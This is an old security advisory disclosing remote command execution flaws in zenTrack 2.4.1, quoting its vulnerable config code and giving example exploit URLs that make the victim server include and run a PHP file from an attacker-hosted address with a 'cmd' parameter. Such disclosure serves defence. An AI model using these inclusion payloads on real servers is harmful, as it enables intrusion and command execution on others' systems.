Subject: zenTrack Remote Command Execution Vulnerabilities Author: farking (farking@i-ownur.info) Product: zenTrack 2.4.1 (latest) and below Vendor: http://zendocs.phpzen.net/zentrack / http://sourceforge.net/projects/zentrack/ Status: Vendor contacted (27/05/2003) Location: http://farking.daemon.sh/advisories/zentrack-062003.txt Greet to: corpsie & EvoIVGSR Description ----------- zenTrack is a flexible system for tracking work, requests, information, and customer care. The goal of the project is to provide a method for organizing, managing, and archiving requests, work, and information in a structured and reliable method. Details ------- zenTrack vulnerability exist in header.php that hold zenTrack configuration settings. Some code <? : $libDir = "/web/zentrack/includes"; $rootUrl = "http://www.yourhost.com/zentrack";; $Debug_Mode = 0; $Demo_Mode = "off"; $configFile = "$libDir/configVars.php"; : ?> This allow anyone to take advantage of this vulnerability and run remote command as webserver privilege. For example: http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php? cmd=pwd or Create translator.class anywhere in your website contain php code that allow you to run command. For this example I'll create translator.class in the test directory: http://[victim]/zentrack/www/index.php?libDir=http:// [attacker]/test/&cmd=pwd If you dont wan't to see any error just copy translator.class as zenTrack.class :) Other vulnerability is attacker can turn zenTrack demo mode to on or set zenTrack debug mode that will show extra info. ------------------------------ farking (farking@i-ownur.info) http://farking.daemon.sh
